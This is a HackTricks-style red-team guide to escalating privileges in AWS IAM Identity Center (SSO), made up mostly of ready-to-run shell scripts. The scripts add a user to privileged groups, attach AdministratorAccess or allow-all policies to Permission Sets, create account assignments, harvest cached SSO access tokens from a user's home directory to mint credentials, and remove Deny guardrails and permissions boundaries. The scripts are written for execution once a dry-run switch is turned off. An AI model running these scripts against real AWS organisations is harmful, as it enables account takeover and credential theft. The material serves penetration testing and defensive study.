AWS - SSO & identitystore Privesc
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
For more information about AWS Identity Center / AWS SSO check:
AWS - IAM, Identity Center & SSO Enum
Note that by default only principals in the organization's Management Account can access and control IAM Identity Center. Principals from another account can only manage it if that account has been registered as a Delegated Administrator for Identity Center. Check the docs for more info.
An easy way to escalate privileges in a setup like this would be a permission that lets you reset users' passwords. Unfortunately the reset only sends the user an email with a reset link, so you would also need access to that user's mailbox. (The Identity Center console's Reset password dialog can alternatively generate a one-time password for the user, but that is a console feature rather than a public API, so it needs console access to the Management Account or a Delegated Administrator.)
identitystore:CreateGroupMembership
With this permission it's possible to add a user to a group, so that the user inherits every account assignment (Permission Set in an account) the group has.
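The group-membership privesc described above, as an added shell example (editor's code, not from the original page). It resolves the identity store, group and user IDs with client-side JMESPath filtering, performs the membership call, and then lists what the group's assignments are so you know what the user just inherited. The identity store ID, instance ARN, group name `Admins` and user name `attacker` are placeholders you must replace; `DRY_RUN=1` (the default) prints each aws command instead of running it, so the script can be inspected offline.

```shell
#!/bin/sh
# Added example (not from the original page): abuse identitystore:CreateGroupMembership
# to put a user you control into a privileged group. The group then passes on every
# account assignment it holds. All IDs/names below are placeholders.
# DRY_RUN=1 (default) prints the aws commands instead of executing them.
DRY_RUN=${DRY_RUN:-1}

run() {
  if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# 1. Identity store behind the Identity Center instance (needs sso:ListInstances).
identity_store_id() {
  run aws sso-admin list-instances --query 'Instances[0].IdentityStoreId' --output text
}

# 2. Resolve group/user IDs client-side with --query, so only
#    identitystore:ListGroups / identitystore:ListUsers are needed.
group_id_by_name() {
  # $1 identity store id, $2 group display name
  run aws identitystore list-groups --identity-store-id "$1" \
    --query "Groups[?DisplayName=='$2'].GroupId" --output text
}

user_id_by_name() {
  # $1 identity store id, $2 user name
  run aws identitystore list-users --identity-store-id "$1" \
    --query "Users[?UserName=='$2'].UserId" --output text
}

# 3. The privesc itself: one call and the user inherits the group's assignments.
add_user_to_group() {
  # $1 identity store id, $2 group id, $3 user id
  run aws identitystore create-group-membership --identity-store-id "$1" \
    --group-id "$2" --member-id "UserId=$3"
}

# 4. Check what was inherited (needs sso:ListAccountAssignmentsForPrincipal).
inherited_assignments() {
  # $1 instance arn, $2 group id
  run aws sso-admin list-account-assignments-for-principal --instance-arn "$1" \
    --principal-type GROUP --principal-id "$2"
}

# Usage with placeholder IDs (with DRY_RUN=1 this only prints the commands).
# Real run: STORE=$(identity_store_id); GROUP=$(group_id_by_name "$STORE" Admins); ...
add_user_to_group d-1234567890 GROUP_ID USER_ID
inherited_assignments arn:aws:sso:::instance/ssoins-1234567890abcdef GROUP_ID
```

Run with `DRY_RUN=0` and the real IDs from the lookup functions to execute; the membership call returns a `MembershipId` that the defender can later use with `delete-group-membership`.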
sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet
An attacker with these permissions could put an inline policy with extra permissions into a Permission Set that is assigned to a user under their control. Editing a Permission Set does not update the roles already created in the accounts, so the attacker also needs to call ProvisionPermissionSet to push the change to the accounts where the Permission Set is provisioned.
sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet
An attacker with these permissions could attach an AWS managed policy (e.g. AdministratorAccess) to a Permission Set that is assigned to a user under their control, then reprovision the Permission Set so the change reaches the accounts.
sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet
An attacker with these permissions could attach a customer managed policy reference to a Permission Set that is assigned to a user under their control, then reprovision it.
To abuse these permissions you need to know the name (and path) of a customer managed policy that exists in ALL the accounts where the Permission Set is provisioned: the Permission Set only stores the name and path, and provisioning fails in any account that has no policy with that name.
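The three "modify the Permission Set, then reprovision" variants above (inline policy, AWS managed policy, customer managed policy reference), as one added shell example (editor's code, not from the original page). It also shows the two checks worth running around the change: which accounts carry the Permission Set, and whether the asynchronous provisioning finished. The instance and Permission Set ARNs and the customer managed policy name `Guardrail` are placeholders; `DRY_RUN=1` (default) prints the commands instead of executing them.

```shell
#!/bin/sh
# Added example (not from the original page): grow a Permission Set that is already
# assigned to a principal you control, then reprovision it so the new definition reaches
# the IAM roles Identity Center created in the member accounts. ARNs are placeholders.
# DRY_RUN=1 (default) prints the aws commands instead of executing them.
DRY_RUN=${DRY_RUN:-1}
run() { if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi; }

INSTANCE_ARN=${INSTANCE_ARN:-arn:aws:sso:::instance/ssoins-1234567890abcdef}
PS_ARN=${PS_ARN:-arn:aws:sso:::permissionSet/ssoins-1234567890abcdef/ps-1234567890abcdef}

# Variant 1: sso:PutInlinePolicyToPermissionSet. The inline policy replaces any existing
# inline policy of the Permission Set, so an allow-all document is enough.
put_admin_inline_policy() {
  run aws sso-admin put-inline-policy-to-permission-set --instance-arn "$INSTANCE_ARN" \
    --permission-set-arn "$1" \
    --inline-policy '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'
}

# Variant 2: sso:AttachManagedPolicyToPermissionSet with an AWS managed policy, whose ARN
# is the same in every account.
attach_admin_managed_policy() {
  run aws sso-admin attach-managed-policy-to-permission-set --instance-arn "$INSTANCE_ARN" \
    --permission-set-arn "$1" --managed-policy-arn arn:aws:iam::aws:policy/AdministratorAccess
}

# Variant 3: sso:AttachCustomerManagedPolicyReferenceToPermissionSet. Only name and path
# are stored; provisioning fails in any account that has no policy with that name/path.
attach_customer_managed_policy() {
  # $1 permission set arn, $2 policy name, $3 path (default /)
  run aws sso-admin attach-customer-managed-policy-reference-to-permission-set \
    --instance-arn "$INSTANCE_ARN" --permission-set-arn "$1" \
    --customer-managed-policy-reference "Name=$2,Path=${3:-/}"
}

# Required after any of the above (sso:ProvisionPermissionSet): existing assignments are
# not updated until the Permission Set is pushed to every account that has it.
reprovision() {
  run aws sso-admin provision-permission-set --instance-arn "$INSTANCE_ARN" \
    --permission-set-arn "$1" --target-type ALL_PROVISIONED_ACCOUNTS
}

# Checks: which accounts carry the Permission Set, and whether provisioning finished
# (sso:ListAccountsForProvisionedPermissionSet / sso:DescribePermissionSetProvisioningStatus).
accounts_with_permission_set() {
  run aws sso-admin list-accounts-for-provisioned-permission-set \
    --instance-arn "$INSTANCE_ARN" --permission-set-arn "$1" --output text
}
provisioning_status() {
  # $1 = RequestId returned by provision-permission-set
  run aws sso-admin describe-permission-set-provisioning-status --instance-arn "$INSTANCE_ARN" \
    --provision-permission-set-request-id "$1"
}

# Usage with the placeholder ARNs (prints under DRY_RUN=1).
accounts_with_permission_set "$PS_ARN"
attach_admin_managed_policy "$PS_ARN"
reprovision "$PS_ARN"
```

With `DRY_RUN=0` the `provision-permission-set` call returns a `PermissionSetProvisioningStatus.RequestId`; poll `provisioning_status` until it reports `SUCCEEDED` (or `FAILED`, which for variant 3 usually means the named customer managed policy is missing in one account).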
sso:CreateAccountAssignment
An attacker with this permission could assign a Permission Set to a user under their control in a given account. This call also provisions the Permission Set into the target account, so no separate ProvisionPermissionSet call is needed.
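The account-assignment privesc above, as an added shell example (editor's code, not from the original page). It first checks which accounts are even allowed to manage Identity Center (management account or delegated administrators), discovers the instance and the names of the existing Permission Sets so an admin-level one can be picked, performs the assignment, and polls the asynchronous request. The account ID `111122223333`, the user ID and the ARNs are placeholders; `DRY_RUN=1` (default) prints the commands instead of executing them.

```shell
#!/bin/sh
# Added example (not from the original page): sso:CreateAccountAssignment gives a principal
# you control a Permission Set in a target account. IDs and ARNs are placeholders.
# DRY_RUN=1 (default) prints the aws commands instead of executing them.
DRY_RUN=${DRY_RUN:-1}
run() { if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi; }

# 0. Only the management account or a delegated administrator can call the sso-admin
#    APIs; this lists the delegated ones (needs organizations:ListDelegatedAdministrators).
delegated_admins() {
  run aws organizations list-delegated-administrators --service-principal sso.amazonaws.com
}

# 1. Instance ARN (sso:ListInstances).
instance_arn() {
  run aws sso-admin list-instances --query 'Instances[0].InstanceArn' --output text
}

# 2. Enumerate Permission Sets and read their names to pick a powerful one
#    (sso:ListPermissionSets / sso:DescribePermissionSet).
list_permission_sets() {
  run aws sso-admin list-permission-sets --instance-arn "$1" --output text
}
describe_permission_set() {
  # $1 instance arn, $2 permission set arn
  run aws sso-admin describe-permission-set --instance-arn "$1" --permission-set-arn "$2" \
    --query 'PermissionSet.[Name,SessionDuration]' --output text
}

# 3. The privesc: assign the Permission Set to the user in the target account. The call
#    also provisions the Permission Set into that account, so no reprovisioning is needed.
assign_to_account() {
  # $1 instance arn, $2 permission set arn, $3 target account id, $4 user id
  run aws sso-admin create-account-assignment --instance-arn "$1" --permission-set-arn "$2" \
    --target-type AWS_ACCOUNT --target-id "$3" --principal-type USER --principal-id "$4"
}

# 4. The call is asynchronous; poll with the RequestId it returns
#    (sso:DescribeAccountAssignmentCreationStatus).
assignment_status() {
  # $1 instance arn, $2 request id
  run aws sso-admin describe-account-assignment-creation-status --instance-arn "$1" \
    --account-assignment-creation-request-id "$2"
}

# Usage with placeholders (prints under DRY_RUN=1).
assign_to_account arn:aws:sso:::instance/ssoins-1234567890abcdef \
  arn:aws:sso:::permissionSet/ssoins-1234567890abcdef/ps-1234567890abcdef \
  111122223333 USER_ID
```

Once the status is `SUCCEEDED`, the user can log in through the access portal (or use `aws sso login`) and will see the new account/role pair; a `--principal-type GROUP` assignment works the same way for a group the attacker is a member of.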
sso:GetRoleCredentials
Returns the STS short-term credentials for a given role name (Permission Set) in a given account that is assigned to the user.
However, it takes the user's SSO access token rather than IAM credentials. That token comes from the SSO OIDC device-authorization flow (the same flow `aws sso login` runs), and `aws sso login` caches it in `~/.aws/sso/cache/` until it expires, so on a compromised host the cached token is enough to call this API for every account and role the user is assigned.
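The token flow and the credential retrieval, as an added shell example (editor's code, not from the original page). Steps 1 to 3 are the SSO OIDC device-authorization flow that produces the bearer access token; the alternative reads tokens `aws sso login` already cached on the host; step 4 uses the token to enumerate accounts and roles and mint credentials. The start URL, region and the `hacktricks` client name are placeholders, the browser approval in step 2 is interactive, and `DRY_RUN=1` (default) prints the commands instead of executing them.

```shell
#!/bin/sh
# Added example (not from the original page): obtain the SSO access token that
# sso:GetRoleCredentials needs, then turn it into STS credentials. Placeholders: start URL,
# region (must be the Identity Center region), client name.
# DRY_RUN=1 (default) prints the aws commands instead of executing them.
DRY_RUN=${DRY_RUN:-1}
run() { if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi; }

REGION=${REGION:-us-east-1}
START_URL=${START_URL:-https://d-1234567890.awsapps.com/start}

# 1. Register a public OIDC client (no AWS credentials needed; returns clientId/clientSecret).
register_client() {
  run aws sso-oidc register-client --region "$REGION" --client-name hacktricks --client-type public
}

# 2. Start device authorization: returns deviceCode and verificationUriComplete, which must
#    be opened and approved in a browser by someone holding the user's Identity Center login.
start_device_auth() {
  # $1 clientId, $2 clientSecret
  run aws sso-oidc start-device-authorization --region "$REGION" \
    --client-id "$1" --client-secret "$2" --start-url "$START_URL"
}

# 3. Exchange the approved device code for the bearer accessToken (poll until approved).
create_token() {
  # $1 clientId, $2 clientSecret, $3 deviceCode
  run aws sso-oidc create-token --region "$REGION" --client-id "$1" --client-secret "$2" \
    --grant-type urn:ietf:params:oauth:grant-type:device_code --device-code "$3"
}

# Alternative to 1-3 on a compromised host: `aws sso login` caches the same token as
# "accessToken" in ~/.aws/sso/cache/*.json until it expires.
cached_tokens() {
  grep -ho '"accessToken": *"[^"]*"' "${HOME}/.aws/sso/cache/"*.json 2>/dev/null
}

# 4. With the token: what can this user assume, and credentials for it. These are the
#    "sso" (access portal) APIs, not sso-admin, so no admin permissions are involved.
list_accounts() {
  run aws sso list-accounts --region "$REGION" --access-token "$1"
}
list_account_roles() {
  # $1 token, $2 account id
  run aws sso list-account-roles --region "$REGION" --access-token "$1" --account-id "$2"
}
get_role_credentials() {
  # $1 token, $2 account id, $3 role (Permission Set) name; returns accessKeyId,
  # secretAccessKey and sessionToken valid for the Permission Set's session duration
  run aws sso get-role-credentials --region "$REGION" --access-token "$1" \
    --account-id "$2" --role-name "$3"
}

# Usage with placeholders (prints under DRY_RUN=1).
register_client
get_role_credentials ACCESS_TOKEN 111122223333 AdministratorAccess
```

Note that the access token is a bearer credential: it is tied to the user, not to the host, and stays valid until its `expiresAt`, so copying the cache file to another machine is sufficient to run step 4 from there.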
sso:DetachManagedPolicyFromPermissionSet
An attacker with this permission can detach an AWS managed policy from the specified Permission Set. If that policy only contained Deny statements (a guardrail), detaching it grants more privileges.
sso:DetachCustomerManagedPolicyReferenceFromPermissionSet
An attacker with this permission can detach a customer managed policy reference from the specified Permission Set. If that policy only contained Deny statements, detaching it grants more privileges.
sso:DeleteInlinePolicyFromPermissionSet
An attacker with this permission can delete the inline policy of the specified Permission Set. If the inline policy only contained Deny statements, deleting it grants more privileges.
sso:DeletePermissionsBoundaryFromPermissionSet
An attacker with this permission can remove the permissions boundary from the Permission Set, lifting the restrictions the boundary imposed on every role provisioned from it.
As with the attach operations, these changes only reach accounts that already have the Permission Set once sso:ProvisionPermissionSet is called on it.
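The four "remove a restriction" operations above, as one added shell example (editor's code, not from the original page). Before removing anything it dumps what is attached to the Permission Set, because a detach only pays off if the removed policy was Deny-only (or a permissions boundary); a small `is_deny_only` helper applies that test to a policy document offline. The ARNs and the policy name `Guardrail` are placeholders; `DRY_RUN=1` (default) prints the commands instead of executing them.

```shell
#!/bin/sh
# Added example (not from the original page): strip guardrails from a Permission Set that a
# principal you control already has, then reprovision it. ARNs/names are placeholders.
# DRY_RUN=1 (default) prints the aws commands instead of executing them.
DRY_RUN=${DRY_RUN:-1}
run() { if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi; }

INSTANCE_ARN=${INSTANCE_ARN:-arn:aws:sso:::instance/ssoins-1234567890abcdef}
PS_ARN=${PS_ARN:-arn:aws:sso:::permissionSet/ssoins-1234567890abcdef/ps-1234567890abcdef}

# What restricts the Permission Set right now? (sso:GetInlinePolicyForPermissionSet,
# sso:ListManagedPoliciesInPermissionSet, sso:ListCustomerManagedPolicyReferencesInPermissionSet,
# sso:GetPermissionsBoundaryForPermissionSet)
inline_policy() {
  run aws sso-admin get-inline-policy-for-permission-set --instance-arn "$INSTANCE_ARN" \
    --permission-set-arn "$1" --query InlinePolicy --output text
}
managed_policies() {
  run aws sso-admin list-managed-policies-in-permission-set --instance-arn "$INSTANCE_ARN" \
    --permission-set-arn "$1" --output text
}
customer_policy_refs() {
  run aws sso-admin list-customer-managed-policy-references-in-permission-set \
    --instance-arn "$INSTANCE_ARN" --permission-set-arn "$1" --output text
}
permissions_boundary() {
  run aws sso-admin get-permissions-boundary-for-permission-set --instance-arn "$INSTANCE_ARN" \
    --permission-set-arn "$1"
}

# Offline check on a policy document: removing it can only widen access if every statement
# is a Deny. (Plain grep on the JSON text; good enough for a quick triage.)
is_deny_only() {
  printf '%s' "$1" | grep -q '"Effect": *"Deny"' && ! printf '%s' "$1" | grep -q '"Effect": *"Allow"'
}

# The removals.
detach_managed_policy() {
  # $1 permission set arn, $2 managed policy arn
  run aws sso-admin detach-managed-policy-from-permission-set --instance-arn "$INSTANCE_ARN" \
    --permission-set-arn "$1" --managed-policy-arn "$2"
}
detach_customer_policy() {
  # $1 permission set arn, $2 policy name, $3 path (default /)
  run aws sso-admin detach-customer-managed-policy-reference-from-permission-set \
    --instance-arn "$INSTANCE_ARN" --permission-set-arn "$1" \
    --customer-managed-policy-reference "Name=$2,Path=${3:-/}"
}
delete_inline_policy() {
  run aws sso-admin delete-inline-policy-from-permission-set --instance-arn "$INSTANCE_ARN" \
    --permission-set-arn "$1"
}
delete_boundary() {
  run aws sso-admin delete-permissions-boundary-from-permission-set \
    --instance-arn "$INSTANCE_ARN" --permission-set-arn "$1"
}

# Nothing changes in the accounts until the Permission Set is reprovisioned.
reprovision() {
  run aws sso-admin provision-permission-set --instance-arn "$INSTANCE_ARN" \
    --permission-set-arn "$1" --target-type ALL_PROVISIONED_ACCOUNTS
}

# Usage with placeholders (prints under DRY_RUN=1): triage, remove, reprovision.
permissions_boundary "$PS_ARN"
delete_boundary "$PS_ARN"
detach_customer_policy "$PS_ARN" Guardrail
reprovision "$PS_ARN"
```

With `DRY_RUN=0`, feed the output of `inline_policy` (or the document of a listed customer managed policy, fetched with `aws iam get-policy-version` in the target account) to `is_deny_only` before deleting it; deleting a policy that also carried Allow statements would shrink the attacker's own access instead.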